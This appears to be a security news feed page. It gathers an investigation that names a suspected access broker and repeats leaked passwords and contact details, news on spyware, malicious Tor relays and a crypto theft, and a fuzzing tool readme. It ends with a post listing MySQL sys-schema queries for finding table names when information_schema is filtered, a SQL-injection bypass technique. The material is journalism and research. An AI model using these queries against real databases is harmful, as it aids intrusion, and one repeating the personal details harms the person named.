🔒
There are new articles available, click to refresh the page.
Yesterday — 3 December 2021Main stream

Who Is the Network Access Broker ‘Babam’?

3 December 2021 at 21:53

Rarely do cybercriminal gangs that deploy ransomware gain the initial access to the target themselves. More commonly, that access is purchased from a cybercriminal broker who specializes in acquiring remote access credentials — such as usernames and passwords needed to remotely connect to the target’s network. In this post we’ll look at the clues left behind by “Babam,” the handle chosen by a cybercriminal who has sold such access to ransomware groups on many occasions over the past few years.

Since the beginning of 2020, Babam has set up numerous auctions on the Russian-language cybercrime forum Exploit, mainly selling virtual private networking (VPN) credentials stolen from various companies. Babam has authored more than 270 posts since joining Exploit in 2015, including dozens of sales threads. However, none of Babam’s posts on Exploit include any personal information or clues about his identity.

But in February 2016, Babam joined Verified, another Russian-language crime forum. Verified was hacked at least twice in the past five years, and its user database posted online. That information shows that Babam joined Verified using the email address “[email protected].” The latest Verified leak also exposed private messages exchanged by forum members, including more than 800 private messages that Babam sent or received on the forum over the years.

In early 2017, Babam confided to another Verified user via private message that he is from Lithuania. In virtually all of his forum posts and private messages, Babam can be seen communicating in transliterated Russian rather than by using the Cyrillic alphabet. This is common among cybercriminal actors for whom Russian is not their native tongue.

Cyber intelligence platform Constella Intelligence told KrebsOnSecurity that the [email protected] address was used in 2016 to register an account at filmai.in, which is a movie streaming service catering to Lithuanian speakers. The username associated with that account was “bo3dom.”

A reverse WHOIS search via DomainTools.com says [email protected] was used to register two domain names: bonnjoeder[.]com back in 2011, and sanjulianhotels[.]com (2017). It’s unclear whether these domains ever were online, but the street address on both records was “24 Brondeg St.” in the United Kingdom. [Full disclosure: DomainTools is a frequent advertiser on this website.]

A reverse search at DomainTools on “24 Brondeg St.” reveals one other domain: wwwecardone[.]com. The use of domains that begin with “www” is fairly common among phishers, and by passive “typosquatting” sites that seek to siphon credentials from legitimate websites when people mistype a domain, such as accidentally omitting the “.” after typing “www”.

A banner from the homepage of the Russian language cybercrime forum Verified.

Searching DomainTools for the phone number in the WHOIS records for wwwecardone[.]com  — +44.0774829141 — leads to a handful of similar typosquatting domains, including wwwebuygold[.]com and wwwpexpay[.]com. A different UK phone number in a more recent record for the wwwebuygold[.]com domain — 44.0472882112 — is tied to two more domains – howtounlockiphonefree[.]com, and portalsagepay[.]com. All of these domains date back to between 2012 and 2013.

The original registration records for the iPhone, Sagepay and Gold domains share an email address: [email protected]. A search on the username “bo3dom” using Constella’s service reveals an account at ipmart-forum.com, a now-defunct forum concerned with IT products, such as mobile devices, computers and online gaming. That search shows the user bo3dom registered at ipmart-forum.com with the email address [email protected], and from an Internet address in Vilnius, Lithuania.

[email protected] was used to register multiple domains, including wwwsuperchange.ru back in 2008 (notice again the suspect “www” as part of the domain name). Gmail’s password recovery function says the backup email address for [email protected] is bo3*******@gmail.com. Gmail accepts the address [email protected] as the recovery email for that devrian27 account.

According to Constella, the [email protected] address was exposed in multiple data breaches over the years, and in each case it used one of two passwords: “lebeda1” and “a123456“.

Searching in Constella for accounts using those passwords reveals a slew of additional “bo3dom” email addresses, including [email protected].  Pivoting on that address in Constella reveals that someone with the name Vytautas Mockus used it to register an account at mindjolt.com, a site featuring dozens of simple puzzle games that visitors can play online.

At some point, mindjolt.com apparently also was hacked, because a copy of its database at Constella says the [email protected] used two passwords at that site: lebeda1 and a123456.

A reverse WHOIS search on “Vytautas Mockus” at DomainTools shows the email address [email protected] was used in 2010 to register the domain name perfectmoney[.]co. This is one character off of perfectmoney[.]com, which is an early virtual currency that was quite popular with cybercriminals at the time. The phone number tied to that domain registration was “86.7273687“.

A Google search for “Vytautas Mockus” says there’s a person by that name who runs a mobile food service company in Lithuania called “Palvisa.” A report on Palvisa (PDF) purchased from Rekvizitai.vz — an official online directory of Lithuanian companies — says Palvisa was established in 2011 by a Vytautaus Mockus, using the phone number 86.7273687, and the email address [email protected] The report states that Palvisa is active, but has had no employees other than its founder.

Reached via the [email protected] address, the 36-year-old Mr. Mockus expressed mystification as to how his personal information wound up in so many records. “I am not involved in any crime,” Mockus wrote in reply.

A rough mind map of the connections mentioned in this story.

The domains apparently registered by Babam over nearly 10 years suggest he started off mainly stealing from other cybercrooks. By 2015, Babam was heavily into “carding,” the sale and use of stolen payment card data. By 2020, he’d shifted his focus almost entirely to selling access to companies.

A profile produced by threat intelligence firm Flashpoint says Babam has received at least four positive feedback reviews on the Exploit cybercrime forum from crooks associated with the LockBit ransomware gang.

The ransomware collective LockBit giving Babam positive feedback for selling access to different victim organizations. Image: Flashpoint

According to Flashpoint, in April 2021 Babam advertised the sale of Citrix credentials for an international company that is active in the field of laboratory testing, inspection and certification, and that has more than $5 billion in annual revenues and more than 78,000 employees.

Flashpoint says Babam initially announced he’d sold the access, but later reopened the auction because the prospective buyer backed out of the deal. Several days later, Babam reposted the auction, adding more information about the depth of the illicit access and lowering his asking price. The access sold less than 24 hours later.

“Based on the provided statistics and sensitive source reporting, Flashpoint analysts assess with high confidence that the compromised organization was likely Bureau Veritas, an organization headquartered in France that operates in a variety of sectors,” the company concluded.

In November, Bureau Veritas acknowledged that it shut down its network in response to a cyber attack. The company hasn’t said whether the incident involved ransomware and if so what strain of ransomware, but its response to the incident is straight out of the playbook for responding to ransomware attacks. Bureau Veritas has not yet responded to requests for comment; its latest public statement on Dec. 2 provides no additional details about the cause of the incident.

Flashpoint notes that Babam’s use of transliterated Russian persists on both Exploit and Verified until around March 2020, when he switches over to using mostly Cyrillc in his forum comments and sales threads. Flashpoint said this could be an indication that a different person started using the Babam account since then, or more likely that Babam had only a tenuous grasp of Russian to begin with and that his language skills and confidence improved over time.

Lending credence to the latter theory is that Babam still makes linguistic errors in his postings that suggest Russian is not his original language, Flashpoint found.

“The use of double “n” in such words as “проданно” (correct – продано) and “сделанны” (correct – сделаны) by the threat actor proves that this style of writing is not possible when using machine translation since this would not be the correct spelling of the word,” Flashpoint analysts wrote.

“These types of grammatical errors are often found among people who did not receive sufficient education at school or if Russian is their second language,” the analysis continues. “In such cases, when someone tries to spell a word correctly, then by accident or unknowingly, they overdo the spelling and make these types of mistakes. At the same time, colloquial speech can be fluent or even native. This is often typical for a person who comes from the former Soviet Union states.”

NSO Group spyware used to compromise iPhones of 9 US State Dept officials

3 December 2021 at 21:17

Apple warns that the mobile devices of at least nine US Department of State employees were compromised with NSO Group ‘s Pegasus spyware.

The iPhones of at least nine US state department officials were compromised with the NSO Group’s spyware Pegasus.

The US officials targeted by the surveillance software were either based in Uganda or focused on matters concerning the African country, revealed Reuters which was not able to determine which was NSO client that orchestrated the attacks.

“Apple Inc iPhones of at least nine U.S. State Department employees were hacked by an unknown assailant using sophisticated spyware developed by the Israel-based NSO Group, according to four people familiar with the matter.” reads the post published by Reuters. “The intrusions, first reported here, represent the widest known hacks of U.S. officials through NSO technology.”

NSO Group told Reuters that it is not aware of the tools used in the attacks and added it has canceled the customer accounts, anyway it declared that will investigate the incidents. NSO Group added that once the surveillance spyware is sold to a customer it is not able to know who will be the targets of the customer.

NSO announced that it will cooperate with any relevant government authority to track down the attackers.

“If our investigation shall show these actions indeed happened with NSO’s tools, such customer will be terminated permanently and legal actions will take place,” said an NSO spokesperson, who added that NSO will also “cooperate with any relevant government authority and present the full information we will have.”

Early November, the U.S. sanctioned four companies for the development of surveillance malware or the sale of hacking tools used by nation-state actors, including NSO Group. NSO Group and Candiru are being sanctioned for the development and sale of surveillance software used to spy on journalists and activists. 

In November, Apple has sued NSO Group and its parent company Q Cyber Technologies in a U.S. federal court for illegally targeting its customers with the surveillance spyware Pegasus.

According to the lawsuit, the surveillance firm is accountable for hacking into Apple’s iOS-based devices using zero-click exploits. The software developed by the surveillance firm was used to spy on activists, journalists, researchers, and government officials.

Apple also announced it would support with a contribution of $10 million to the academic research in unmasking the illegal surveillance activities

“Apple today filed a lawsuit against NSO Group and its parent company to hold it accountable for the surveillance and targeting of Apple users. The complaint provides new information on how NSO Group infected victims’ devices with its Pegasus spyware. To prevent further abuse and harm to its users, Apple is also seeking a permanent injunction to ban NSO Group from using any Apple software, services, or devices.” reads the announcement published by Apple.

The legal action aims at permanently preventing the infamous company from breaking into any Apple software, services, or devices.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Apple)

The post NSO Group spyware used to compromise iPhones of 9 US State Dept officials appeared first on Security Affairs.

IDA2Obj - Static Binary Instrumentation

3 December 2021 at 20:30
By: Zion3R


IDA2Obj is a tool to implement SBI (Static Binary Instrumentation).

The working flow is simple:

  • Dump object files (COFF) directly from one executable binary.
  • Link the object files into a new binary, almost the same as the old one.
  • During the dumping process, you can insert any data/code at any location.
    • SBI is just one of the using scenarios, especially useful for black-box fuzzing.

How to use

  1. Prepare the enviroment:

    • Set AUTOIMPORT_COMPAT_IDA695 = YES in the idapython.cfg to support the API with old IDA 6.x style.
    • Install dependency: pip install cough
  2. Create a folder as the workspace.

  3. Copy the target binary which you want to fuzz into the workspace.

  4. Load the binary into IDA Pro, choose Load resources and manually load to load all the segments from the binary.

  5. Wait for the auto-analysis done.

  6. Dump object files by running the script MagicIDA/main.py.

    • The output object files will be inside ${workspace}/${module}/objs/afl.
    • If you create an empty file named TRACE_MODE inside the workspace, then the output object files will be inside ${workspace}/${module}/objs/trace.
    • By the way, it will also generate 3 files inside ${workspace}/${module} :
      • exports_afl.def (used for linking)
      • exports_trace.def (used for linking)
      • hint.txt (used for patching)
  7. Generate lib files by running the script utils/LibImports.py.

    • The output lib files will be inside ${workspace}/${module}/libs, used for linking later.
  8. Open a terminal and change the directory to the workspace.

  9. Link all the object files and lib files by using utils/link.bat.

    • e.g. utils/link.bat GdiPlus dll afl /RELEASE
    • It will generate the new binary with the pdb file inside ${workspace}/${module}.
  10. Patch the new built binary by using utils/PatchPEHeader.py.

    • e.g. utils/PatchPEHeader.py GdiPlus/GdiPlus.afl.dll
    • For the first time, you may need to run utils/register_msdia_run_as_administrator.bat as administrator.
  11. Run & Fuzz.

More details

HITB Slides : https://github.com/jhftss/jhftss.github.io/blob/main/res/slides/HITB2021SIN%20-%20IDA2Obj%20-%20Mickey%20Jin.pdf

Demo : https://drive.google.com/file/d/1N3DXJCts5jG0Y5B92CrJOTIHedWyEQKr/view?usp=sharing



Threat Roundup for November 26 to December 3

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 26 and Dec. 3. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics,...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

Talos Takes Ep. #79: Emotet's back with the worst type of holiday present

3 December 2021 at 15:46
By Jon Munshaw. The latest episode of Talos Takes is available now. Download this episode and subscribe to Talos Takes using the buttons below, or visit the Talos Takes page. Emotet is back, and it brought the worst possible holiday present (just in time for peak spam season, too!). We...

[[ This is only the beginning! Please visit the blog for the complete entry ]]

KAX17 threat actor is attempting to deanonymize Tor users running thousands of rogue relays

3 December 2021 at 15:33

Since 2017, an unknown threat actor has run thousands of malicious Tor relay servers in the attempt to unmask Tor users.

A mysterious threat actor, tracked as KAX17, has run thousands of malicious Tor relay servers since 2017 in an attempt to deanonymize Tor users.

KAX17 ran relay servers in various positions within the Tor network, including entry and exit nodes, researchers at the Tor Project have removed hundreds of servers set up by the threat actor in October and November 2021.

In August 2020, the security researcher that goes online with the moniker Nusenu revealed that in May 2020 a threat actor managed to control roughly 23% of the entire Tor network’s exit nodes. Experts warned that this was the first time that a single actor controlled such a large number of Tor exit nodes. A Tor exit relay is the final relay that Tor traffic passes through before it reaches the intended destination. The Tor traffic exits through these relays, this means that the IP address of the exit relay is interpreted as the source of the traffic.  Tor Exit relays advertise their presence to the entire Tor network, so they can be used by any Tor user.

Controlling these relays it is possible to see which website the user connects to and, if an insecure connection is used, it is also possible to manipulate traffic. In May 2020, the threat actor managed to control over 380 Tor exit nodes, with a peak on May 22, when he controlled the 23.95% of Tor exit relay.

Nusenu told The Record that it has observed a recrudescence of the phenomenon associated to the same attacker.

“But a security researcher and Tor node operator going by Nusenu told The Record this week that it observed a pattern in some of these Tor relays with no contact information, which he first noticed in 2019 and has eventually traced back as far as 2017.” reads the post published by The Record. “Grouping these servers under the KAX17 umbrella, Nusenu says this threat actor has constantly added servers with no contact details to the Tor network in industrial quantities, operating servers in the realm of hundreds at any given point.”

Most of the Tor relay servers set up by the KAX17 actor were located in data centers all over the world and are configured as entry and middle points primarily. Nusenu pointed out that, unlike other threat actors he analyzed in the past, the KAX17 group only operates a small number of exit points.

This circumstance suggests that the group is operating to track Tor users within the anonymizing network, Nusenu also believes that the KAX17 is an APT group.

Below are some insights on the KAX17 profile provided by the researcher in a post:

  • active since at least 2017
  • sophistication: non-amateur level and persistent
  • uses large amounts of servers across many (>50) autonomous systems (including non-cheap cloud hosters like Microsoft)
  • operated relay types: mainly non-exits relays (entry guards and middle relays) and to a lesser extend tor exit relays
  • (known) concurrently running relays peak: >900 relays
  • (known) advertised bandwidth capacity peak: 155 Gbit/s
  • (known) probability to use KAX17 as first hop (guard) peak: 16%
  • (known) probability to use KAX17 as second hop (middle) peak: 35%
  • motivation: unknown; plausible: Sybil attack; collection of tor client and/or onion service IP addresses; deanonymization of tor users and/or onion services

The expert states that the probability to connect a guard relay operated by KAX17 was 16%, a percentage that pass to 35% when analyzing the probability to pass through one of the middle relays set up by the threat actor.

“The following graph shows (known) KAX17′ network fraction in % of the entire tor network for each position (first, second and last hop of a tor circuit) over the past 3 years.”

KAX17 Tor

Nusenu shared its findings with the Tor Project since last year, and the Tor security experts removed all the exit relays set up by the group in October 2020. The Tor Project also removed a set of KAX17 malicious relays between October, and November 2021.

The expert also states that KAX17’s poor OpSec revealed the use of email address in relay’s ContactInfo, but it is impossible to determine its authenticity, we cannot exclude that it is a false flag.

“Detecting and removing malicious tor relays from the network has become an impractical problem to solve. We presented a design and proof of concept implementation towards better self-defense options for tor clients to reduce their risk from malicious relays without requiring their detection.” concludes the researcher.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Tor)

The post KAX17 threat actor is attempting to deanonymize Tor users running thousands of rogue relays appeared first on Security Affairs.

End-to-end Testing: How a Modular Testing Model Increases Efficiency and Scalability

3 December 2021 at 09:00

In our last post, Testing Data Flows using Python and Remote Functions, we discussed how organizations can use remote functions in Python to create an end-to-end testing and validation strategy. Here we build on that concept and discuss how it is possible to design the code to be more flexible.  

For our purposes, flexible code means two things:

  1. Writing the code in such a way that most of it can be reused
  2. Creating a pool of functionalities that can be combined to create tests that are bigger and more complex.
What is a flow?
A flow is any unique complex sequence of steps and interactions that is independently testable.
Flows can mimic business or functional requirements.
Flows can be combined in any way between themselves to create higher level or specific flows.

The Need to Update the Classic Testing View

A classical testing view is defined by a sequence of steps that do a particular action on the system. This typically contains:

  • A setup which will prepare the test environment for the actual test. Eg: creating users, populating data into a DB, etc.
  • A series of actions that modifies the current state of the system and checks for the outcome of the performed actions
  • A teardown that should return the system to initial state before the test

Each of these actions are separate but dependent on one another. This means that for each test, we can assume that the setup has run successfully and, in the end, that the teardown has run to clean it up. In complex test scenarios this can become cumbersome and difficult to orchestrate or reuse.

In a classical testing model, unless the developer writes helpers that are used inside the test, the code typically cannot be reused to build other tests. In addition, when helpers are written, they tend to be specific to certain use cases and scenarios, making them irrelevant in most other situations. On the other hand, some helpers are so generic that they will still require the implementation of additional logic when using them with certain test data.

Finally, using test-centric development means that many test sequences or test scenario steps must be rewritten every time you need them in different combinations of functionality and test data.

CrowdStrike’s Approach: A Modular Testing Model

To avoid these issues, we take a modularized approach to testing. You can imagine each test component as a Lego block, wherein each piece can be made to fit together in order to create something bigger or more complex. 

These flows can map to a specific functionality and should be atomic. As more complex architectures are built, unless the functionality has changed, you don’t need to rewrite existing functions to fit. Rather, you can combine them to follow business context and business use cases. 

The second part of our approach relates to functional programming, which means we create independent testable functions. We can then separate data into payloads to functions, making them easy to process in parallel.

Business Case: A Product That Identifies Security Vulnerabilities

To illustrate this point, let’s take a business use case for a product that identifies vulnerabilities for certain applications installed on a PC. The evaluation will be based on information sent by agents installed on PCs about supported installed applications. Information could be the name of the application, installed version, architecture (32 or 64 bits). This use case dictates that if a computer is online, the agent will send all relevant information to the cloud where it will be processed and evaluated against a publicly available DB of vulnerabilities (NVD). (If you are unfamiliar with common vulnerabilities and exposures, or CVE, learn more here.)

Our testing flows will be designed around the actual product and business flows. You can see below a basic diagram of the architecture for this proposed product.

You can see the following highlights from the diagram above:

  • A database of profiles for different versions of OS and application to be able to cover a wide range of configurations 
  • An orchestrator for the tests which is called Test Controller with functionalities:
    • Algorithm for selecting datasets based on the particularities of the scenario it has to run
    • Support for creating constructs for the simulated data. 
    • Constructs that will be used to create our expected data in order to do our validations post-processing

There is a special section for generating and sending data points to the cloud. This can be distributed and every simulated agent can be run in parallel and scaled horizontally to cover performance use cases.

Interaction with post-processed data is done through internal and external flows each with their own capabilities and access to data through auto-generated REST/GRPC clients.

Below you can see a diagram of the flows designed to test the product and interaction between them.

A closer look at the flows diagram and code

Flows are organized into separate packages based on actual business needs. They can be differentiated into public and internal flows. A general rule of thumb is that public flows can be used to design test scenarios, whereas internal flows should only be used as helpers inside other flows. Public flows should always implement the same parameters, which are the structures for test data (in our case being simulated hosts and services).

# Build Simulated Hosts/Services Constructs

In this example all data is stored in a simulated host construct. This is created at the beginning of the test based on meaningful data selection algorithms and encapsulates data relevant to the test executed, which may relate to a particular combination of OS or application data.

import agent_primitives

from api_helpers import VulnerabilitiesDbApiHelperRest, InternalVulnerabilitiesApiHelperGrpc, ExternalVulnerabilitiesApiHelperRest

@dataclass
class TestDataApp:
   name: str
   version: str
   architecture: str
   vendor: str


@dataclass
class TestDataDevice:
   architecture: ArchitectureEnum
   os_version: str
   kernel: str


@dataclass
class TestDataProfile:
   app: TestDataApp
   device: TestDataDevice


@dataclass
class SimulatedHost:
   id: str
   device: TestDataDevice
   apps: List[TestDataApp]
   agent: agent_primitives.SimulatedAgent


def flow_build_test_data(profile: TestDataProfile, count: int) -> List[SimulatedHost]:
   test_data_configurations = get_test_data_from_s3(profile, count)
   simulated_hosts = []
   for configuration in test_data_configurations:
       agent = agent_primitives.get_simulated_agent(configuration)
       host = SimulatedHost(device=configuration.get('device'),
                            apps=[TestDataApp(**app) for app in configuration.get('apps')],
                            agent=agent)
       simulated_hosts.append(host)
   return simulated_hosts

Once the Simulated Host construct is created, it can be passed to any public flows that accept that construct. This will be our container of test data to be used in all other testing flows. 

In case you need to mutate states or other information related to that construct, any particular flow can return the host’s constructs to be used by another higher-level flow.

TestServices construct encompasses all the REST/GRPC services clients that will be needed to interact with cloud services to perform queries, get post-processing data, etc. This will be initialized once and passed around where it is needed.

@dataclass
class TestServices:
   vulnerabilities_db_api: VulnerabilitiesDbApiHelperRest
   internal_vulnerabilities_api: InternalVulnerabilitiesApiHelperGrpc
   external_vulnerabilities_api: ExternalVulnerabilitiesApiHelperRest

Function + Data constructs = Flow. Separation of data and functionality is crucial in this approach. Besides the fact that it makes the function work with a large number of payloads that implement the same structure, it also makes curating datasets a lot easier when implementing complex logic for selection data for particular scenarios independent from function implementation.

# Agent Flows

def flow_agent_ready_for_cloud(simulated_hosts: List[SimulatedHost]):
   for host in simulated_hosts:
       host.agent.ping_cloud()
       host.agent.keepalive()
       host.agent.connect_to_cloud()

def flow_agent_send_device_information(simulated_hosts: List[SimulatedHost]):
   for host in simulated_hosts:
       host.agent.send_device_data(host.device_name)
       host.agent.send_device_data(host.device.architecture)
       host.agent.send_device_data(host.device.os_version)
       host.agent.send_device_data(host.device.kernel)

def flow_agent_application_information(simulated_hosts: List[SimulatedHost]):
   for host in simulated_hosts:
       for app in host.apps:
           host.agent.send_application_data(app.application_name)
           host.agent.send_application_data(app.version)

Notice the name of one of the functions above, which captures the main purpose of the function like flow_agent_send_device_information that will send device information like os_version, device_name.

# Internal API Flows

Internal flows are mainly used to gather information from services and do validations. For validations we use a Python library called PyHamcrest and a generic validation method that compares our internal structures with expected outcome built at the beginning of test

@retry(AssertionError, tries=8, delay=3, backoff=2, logger=logging)
def flow_validate_simulated_hosts_for_vulnerabilities(hosts: List[SimulatedHost], services: TestServices):
   expected_data = build_expected_flows.evaluate_simulated_hosts_for_vulnerabilities(simulated_hosts, services)
   for host in simulated_host:
       actual_data = flow_get_simulated_host_vulnerability_flow(host, services)
       augmented_expected = {
           "total": sum([expected_data.total_open,
                         expected_data.total_reopen,
                         expected_data.total_closed])
       }
       actual, expected, missing_fields = test_utils.create_validation_map(actual_data, [expected_data],
                                                                           augmented_expected)
       test_utils.assert_on_validation_map(actual_status_counter, actual, expected, missing_fields)


def flow_get_simulated_host_vulnerabilities(simulated_host: SimulatedHost, services: TestServices):
   response = services.internal_vulnerabilities_api.get_vulnerabilities(host)
   response_json = validate_response_call_and_get_json(rest_response, fail_on_errors=True)
   return response_json

We first use a method called create_validation_map which takes a list of structures that will contain data relevant for the actual response from the services. This is used to normalize all the structures and create an actual and an expected validation map which will be used in the assert_on_validation_map method together with a specific matcher from PyHamcrest called has_entries to do the assert.

The Advantages of a Modular Testing Approach 

There are several key advantages to this approach: 

  1. Increased testing versatility and simplicity. Developers are not dependent on a certain implementation because everything is unique to that function. Modules are independent and can work in any combination. The code base is independently testable. As such, if you have two flows that do the same thing, it means that one can be removed. 
  2. Improved efficiency. It is possible to “double track” most of the flows so that they can be processed in parallel. This means that they can run in any sequence and that the load can be distributed to run in a distributed infrastructure. Because there are no dependencies between the flows, you can also “parallelize” it locally to run multiple threads or multiple processes.
  3. Enhanced testing maturity. Taken together, these principles mean that developers can build more and more complex tests by reusing common elements and building on top of what exists. Test modules can be developed in parallel because they don’t have dependencies between them. Every flow covers a small part of functionality.

Final Thoughts: When to Use Flow-based Testing

Flow-based testing works well in end-to-end tests for complex products and distributed architectures because it takes the best practices in writing and testing code at scale. Testing and validation has a basis in experimental science and implementing a simulated version of the product inside the validation engine is still one of the most comprehensive ways to test the quality of a product. Flows-based testing helps to reduce the complexity in building this and makes it scalable and easier to maintain than the classical testing approach.

However, it is not ideal when testing a single service due to the complexity that exists at the beginning of the process related to data separation and creation of structures to serialize data. In those instances, the team would probably be better served by a classical testing approach. 

Finally, in complex interactions between multiple components, functionality needs to be compartmentalized in order to run it at scale. In that case, flow-based testing is one of the best approaches you can take.

When do you use flow-based testing — and what questions do you have? Sound off on our social media channels @CrowdStrike.

Researchers Detail How Pakistani Hackers Targeting Indian and Afghan Governments

3 December 2021 at 13:54
A Pakistani threat actor successfully socially engineered a number of ministries in Afghanistan and a shared government computer in India to steal sensitive Google, Twitter, and Facebook credentials from its targets and stealthily obtain access to government portals. Malwarebytes' latest findings go into detail about the new tactics and tools adopted by the APT group known as SideCopy, which is

Threat actors stole $120 M in crypto from BadgerDAO DeFi platform

3 December 2021 at 12:16

Threat actors stole $120 million in cryptocurrencies from multiple wallets connected to the decentralized finance platform BadgerDAO.

Threat actors this week have hacked the decentralized finance platform BadgerDAO and have stolen $120.3 million in crypto funds, blockchain security firm PeckShield reported. Most of the stolen funds, over $117 million, were Bitcoin, while the rest of the stolen assets were stored in the form of interest-bearing Bitcoin, a form of tokenised Bitcoin, and Ether.

BadgerDAO is a decentralised autonomous organisation (DAO) that allows customers to bridge user’s Bitcoin into other blockchains.

Here is the current whereabouts as well as the total loss: $120.3M (with ~2.1k BTC + 151 ETH) @BadgerDAO pic.twitter.com/fJ4hJcMWTq

— PeckShield Inc. (@peckshield) December 2, 2021

The attackers were able to inject a malicious script into the UI of BadgerDAO website that allowed them to intercept and hijack Web3 transactions. The funds were hijacked to the wallet under the control of the attackers.

Peckshield was able to track the stolen funds:

Here is the list of funds that were so far transferred out from victims @BadgerDAO pic.twitter.com/P5pOj1YQ2l

— PeckShield Inc. (@peckshield) December 2, 2021

The malicious script was injected as early as November 10th, but the threat actors ran it at random intervals to avoid detection. BadgeDAO notified US and Canadian authorities and is investigating the security breach with the help of forensics firm Chainalysis.

Badger has received reports of unauthorized withdrawals of user funds.

As Badger engineers investigate this, all smart contracts have been paused to prevent further withdrawals.

Our investigation is ongoing and we will release further information as soon as possible.

— ₿adgerDAO 🦡 (@BadgerDAO) December 2, 2021

The investigation continues.

Badger has retained data forensics experts Chainalysis to explore the full scale of the incident & authorities in both the US & Canada have been informed & Badger is cooperating fully with external investigations as well as proceeding with its own.

— ₿adgerDAO 🦡 (@BadgerDAO) December 2, 2021

Once Badger discovered the unauthorized transfers, it paused all smart contracts, it also advised users to decline all transactions to addresses that are under the control of the attackers.

According to The Verge website, Badger is investigating is how threat actors had access to Cloudflare via an API key that should’ve been protected by two-factor authentication.

“While the attack didn’t reveal specific flaws within Blockchain tech itself, it managed to exploit the older “web 2.0” technology that most users need to use to perform transactions. Multi-factor authentication systems protect our accounts against many phishing schemes or bulk credential stuffing attacks. Still, experts have repeatedly warned about targeted phishing attacks that can bypass it, while toolkits to automate the process have been available for years.” reported The Verge.

“All [the] blockchain / smart contract audits in the world, and people lose 120m to a Cloudflare API leak by a sloppy team where a dude passes a new approval to his contract in the site header – GG – we still have a long way to go.” A member of the team said, “I’m sure we will have some mitigation procedures proposed after this.” reads the comment of a user within Badger’s Discord.

DeFi platforms are under attack, according to a report published by AtlasVPN in august, the DeFi hacks accounted for 76% of all hacks between January and July 2021. The report states that over $129 million were stolen in DeFi attacks in 2020.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, BadgerDAO)

The post Threat actors stole $120 M in crypto from BadgerDAO DeFi platform appeared first on Security Affairs.

Alternatives to Extract Tables and Columns from MySQL and MariaDB

27 January 2020 at 22:48

I’ve previously published a post on extracting table names when /or/i was filtered which leads to filtering of the word information_schema. I did some more research into this area on my own and found many other tables where you can extract the table names. These are all the databases and tables I found where we can extract table names apart from ‘information_schema.tables’. I have tested the following in 5.7.29 MySQL and 10.3.18 MariaDB. There are 39 queries in total.

Sys

These views were added in MySQL 5.7.9.

mysql> SELECT object_name FROM `sys`.`x$innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| flag        |
| referers    |
| uagents     |
| users       |
+-------------+
5 rows in set (0.04 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$schema_flattened_keys` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
5 rows in set (0.01 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$ps_schema_table_statistics_io` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| db         |
| emails     |
| flag       |
| referers   |
| uagents    |
| users      |
+------------+
6 rows in set (0.04 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$schema_index_statistics` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| table_name |
+------------+
| users      |
| emails     |
| referers   |
| uagents    |
| flag       |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| emails     |
| users      |
| flag       |
| referers   |
| uagents    |
+------------+
5 rows in set (0.03 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics_with_buffer` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| referers   |
| uagents    |
| emails     |
| users      |
| flag       |
+------------+
5 rows in set (0.07 sec)

mysql> SELECT object_name FROM `sys`.`innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
+-------------+
| object_name |
+-------------+
| emails      |
| flag        |
| referers    |
| uagents     |
| users       |
+-------------+
5 rows in set (0.05 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`schema_auto_increment_columns` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| table_name |
+------------+
| referers   |
| flag       |
| emails     |
| users      |
| uagents    |
+------------+
5 rows in set (0.14 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`schema_index_statistics` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| table_name |
+------------+
| users      |
| emails     |
| referers   |
| uagents    |
| flag       |
+------------+
5 rows in set (0.00 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`schema_table_statistics` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| users      |
| emails     |
| referers   |
| uagents    |
| flag       |
+------------+
5 rows in set (0.04 sec)

mysql> SELECT TABLE_NAME FROM `sys`.`schema_table_statistics_with_buffer` WHERE TABLE_SCHEMA = DATABASE();
+------------+
| TABLE_NAME |
+------------+
| users      |
| emails     |
| flag       |
| referers   |
| uagents    |
+------------+
5 rows in set (0.09 sec)

Using these queries, you can get the table file paths stored locally on disk, along with it we can extract the table names.

mysql> SELECT FILE FROM `sys`.`io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
+---------------------------------+
| file                            |
+---------------------------------+
| @@datadir\security\emails.ibd   |
| @@datadir\security\flag.ibd     |
| @@datadir\security\referers.ibd |
| @@datadir\security\uagents.ibd  |
| @@datadir\security\users.ibd    |
| @@datadir\security\uagents.frm  |
| @@datadir\security\referers.frm |
| @@datadir\security\users.frm    |
| @@datadir\security\emails.frm   |
| @@datadir\security\flag.frm     |
| @@datadir\security\db.opt       |
+---------------------------------+
11 rows in set (0.22 sec)

mysql> SELECT FILE FROM `sys`.`io_global_by_file_by_latency` WHERE FILE REGEXP DATABASE();
+---------------------------------+
| file                            |
+---------------------------------+
| @@datadir\security\flag.ibd     |
| @@datadir\security\uagents.ibd  |
| @@datadir\security\flag.frm     |
| @@datadir\security\emails.frm   |
| @@datadir\security\emails.ibd   |
| @@datadir\security\referers.ibd |
| @@datadir\security\referers.frm |
